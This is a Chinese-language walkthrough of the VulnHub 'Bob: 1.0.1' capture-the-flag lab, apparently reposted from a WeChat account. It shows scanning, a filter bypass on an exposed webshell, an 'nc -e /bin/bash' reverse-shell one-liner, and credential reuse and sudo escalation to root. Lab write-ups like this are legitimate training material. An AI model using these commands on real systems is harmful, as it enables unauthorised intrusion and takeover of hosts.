OSCP难度靶机之Bob: 1.0.1

admin 2022年11月1日12:21:11评论106 views字数 990阅读3分18秒阅读模式

虚拟机下载地址:https://www.vulnhub.com/entry/bob-101,226/虚拟机简介:您的目标是将旗帜插进/目标:1个flag级别:中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之Bob: 1.0.1

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.134

查看开放21、80、25468端口

OSCP难度靶机之Bob: 1.0.1

2、渗透测试

2.1 WEB渗透

1.站点访问测试

根据nmap扫描结果提示,发现三个网站路径

OSCP难度靶机之Bob: 1.0.1

login.php页面无法访问,访问/lat_memo.html,提示存在一个webshell

OSCP难度靶机之Bob: 1.0.1

访问dev_shell.php发现可以执行系统命令

OSCP难度靶机之Bob: 1.0.1

2.过滤绕过

测试使用pwd命令发现被过滤

OSCP难度靶机之Bob: 1.0.1

测试通过过滤发现存在备份文件

OSCP难度靶机之Bob: 1.0.1

下载备份文件进行查看被过滤的关键词

OSCP难度靶机之Bob: 1.0.1

3.反弹shell

开启NC监听,并获取到反弹shell连接

nc -lnvp 5555

OSCP难度靶机之Bob: 1.0.1

id | nc -e /bin/bash 192.168.207.130 5555

OSCP难度靶机之Bob: 1.0.1

OSCP难度靶机之Bob: 1.0.1

2.2 主机渗透测试

1.主机信息收集

发现存在4个普通账号

python -c 'import pty;pty.spawn("/bin/bash")'

OSCP难度靶机之Bob: 1.0.1

在elliot目录中发现可疑文件theadminisdumb.txt

cd /home/elliot

OSCP难度靶机之Bob: 1.0.1

发现密码文件信息,提示密码为:Qwerty

cat theadminisdumb.txt

OSCP难度靶机之Bob: 1.0.1

2.账号爆破

通过测试多个账号发现jc用户的密码为:Qwerty

su - jc

OSCP难度靶机之Bob: 1.0.1

在bob的目录中发现staff.txt和login.txt.gpg

cd /home/bob/Documents

OSCP难度靶机之Bob: 1.0.1

OSCP难度靶机之Bob: 1.0.1

3.获取密码信息

经过多个方法测试,发现密码为竖着排列:HARPOCRATES

cd /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here
more notes.sh

OSCP难度靶机之Bob: 1.0.1

4.解密文件

通过密码解密后,获取到bob的账号和密码权限

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

OSCP难度靶机之Bob: 1.0.1

使用bob密码进行登录

su - bob

OSCP难度靶机之Bob: 1.0.1

5.查看用户sudo权限

查看该用户拥有root所有权限

sudo -l

OSCP难度靶机之Bob: 1.0.1

sudo su

OSCP难度靶机之Bob: 1.0.1

6.查看flag

cd /
cat flag.txt

OSCP难度靶机之Bob: 1.0.1

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Bob: 1.0.1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月1日12:21:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之Bob: 1.0.1https://cn-sec.com/archives/1382282.html

发表评论

匿名网友 填写信息